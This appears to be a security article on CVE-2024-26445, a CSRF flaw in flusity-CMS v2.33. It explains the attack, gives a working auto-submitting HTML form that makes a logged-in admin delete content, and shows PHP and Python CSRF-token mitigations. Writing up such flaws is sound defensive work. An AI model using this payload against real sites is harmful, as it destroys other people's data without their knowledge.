In February 2024, cybersecurity researchers discovered a serious Cross-Site Request Forgery (CSRF) vulnerability in flusity-CMS version 2.33. This weakness, tracked as CVE-2024-26445, allows attackers to trick authenticated users into performing sensitive actions—such as deleting data—without their intent, by abusing the /core/tools/delete_place.php component.
In this article, you’ll see how the vulnerability works, explore a proof-of-concept (PoC) exploit, and learn steps for mitigation. If you're running flusity-CMS v2.33, read on—you could be at risk.
What Is CSRF?
CSRF (Cross-Site Request Forgery) is a web security bug where attackers trick users into submitting unwanted actions on a web app where they’re already logged in. It happens when an application relies only on session cookies for user verification, not on anti-CSRF protections like tokens.
- Version: v2.33
- Component: /core/tools/delete_place.php
- Attack Complexity: Low
In flusity-CMS v2.33, the /core/tools/delete_place.php endpoint lets authenticated users delete a "place", possibly a content element. Crucially, this endpoint lacks CSRF protection, meaning a simple crafted HTML request can make *any logged-in admin* delete data, just by visiting a malicious page.
1. The target must be logged into flusity-CMS as an admin (or with delete privileges).
2. The attacker tricks the target into visiting a malicious link or page (for example, via email or chat).
3. The browser sends a hidden request to /core/tools/delete_place.php as if the admin had clicked "Delete" inside the CMS itself!
Because flusity-CMS v2.33 doesn’t check for CSRF tokens, it can’t tell whether the request is genuine.
Exploit Proof of Concept
Below is a simple PoC HTML snippet that an attacker could host on their own website or send by email. If a logged-in admin visits this page, their browser will perform a POST or GET request to the vulnerable PHP file, instructing the CMS to delete a resource—*without their knowledge*.
Exploit Example (HTML)
<!-- CSRF Exploit for flusity-CMS v2.33 -->
<html>
<body>
<form action="http://victim-cms.com/core/tools/delete_place.php" method="POST" id="csrfForm">
<input type="hidden" name="place_id" value="1"> <!-- Replace with target place ID -->
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
How this works
- If an admin is logged into flusity-CMS and visits the above HTML page, their browser will send a POST request to the delete endpoint.
References
- NVD Entry: CVE-2024-26445
- Exploit Report: huntr.dev advisory
1. Upgrade: Check if the vendor has released a patched version. Apply it ASAP.
2. Add CSRF Protection: Ensure all sensitive endpoints require a unique, unpredictable CSRF token per session and per action.
3. Verify User Intent: Always validate actions with user prompts or re-confirm credentials for destructive tasks.
Example of a basic PHP CSRF token check
// At form generation (after session_start())
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));

// In the form (escape the value before echoing it into the HTML attribute)
<input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars($_SESSION['csrf_token']); ?>">

// At the top of delete_place.php, before any deletion logic (after session_start()).
// isset() avoids an undefined-index notice; hash_equals() compares in constant time.
if (!isset($_POST['csrf_token'], $_SESSION['csrf_token'])
    || !hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
    die("CSRF validation failed.");
}
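To make the mitigation steps above concrete, here is an added Python model (not flusity-CMS code, which is PHP) of a hardened delete_place handler: a per-session, per-action token bound with an HMAC, compared in constant time and burned after one use, plus an Origin/Referer check that rejects the cross-site form post the PoC relies on. `ALLOWED_ORIGIN`, the request and session dictionaries and the `places` store are assumptions made for the model.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

ALLOWED_ORIGIN = "https://cms.example"  # assumed deployment origin of the CMS

def issue_token(session: dict, action: str) -> str:
    """Mint a token bound to this session's secret and to one action; record it for single use."""
    if "csrf_secret" not in session:
        session["csrf_secret"] = secrets.token_bytes(32)
    nonce = secrets.token_hex(16)
    tag = hmac.new(session["csrf_secret"], f"{action}:{nonce}".encode(), hashlib.sha256).hexdigest()
    token = f"{nonce}.{tag}"
    session.setdefault("csrf_issued", set()).add(token)
    return token

def token_valid(session: dict, action: str, token: str) -> bool:
    """Constant-time check of the action binding, then burn the token so it cannot be replayed."""
    secret = session.get("csrf_secret")
    if not secret or "." not in token:
        return False
    nonce, tag = token.split(".", 1)
    expected = hmac.new(secret, f"{action}:{nonce}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return False
    issued = session.setdefault("csrf_issued", set())
    if token not in issued:
        return False  # already used, or never issued for this session
    issued.discard(token)
    return True

def handle_delete_place(request: dict, session: dict, places: dict) -> tuple:
    """Model of a hardened delete_place handler: method, auth, Origin/Referer and token checks."""
    if request.get("method") != "POST":
        return 405, "method not allowed"  # a GET-triggered delete (e.g. via <img src>) is refused
    if not session.get("is_admin"):
        return 403, "forbidden"
    source = request["headers"].get("Origin") or request["headers"].get("Referer") or ""
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != ALLOWED_ORIGIN:
        return 403, "cross-site request blocked"  # the hosted PoC page fails here
    if not token_valid(session, "delete_place", request["form"].get("csrf_token", "")):
        return 403, "CSRF validation failed"
    place_id = request["form"].get("place_id")
    if place_id not in places:
        return 404, "no such place"
    del places[place_id]
    return 200, f"deleted place {place_id}"
```

A real deployment would also set the session cookie with `SameSite=Lax` or `Strict` as a second layer, but the token check must not depend on it.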
Final Thoughts
CVE-2024-26445 is a textbook example of how easily CSRF can sneak into even mature open-source projects like flusity-CMS. With public exploit details now available, threat actors may automate these attacks.
Stay safe: Patch your systems, add missing CSRF protections, and always keep security top-of-mind when developing or deploying any web app.
Please share this article with your network—let’s make CMS security everyone’s responsibility!
*Exclusive for this post. For in-depth guidance, check official resources or consult with a web security expert.*
Timeline
Published on: 02/22/2024 14:15:47 UTC
Last modified on: 08/28/2024 21:35:06 UTC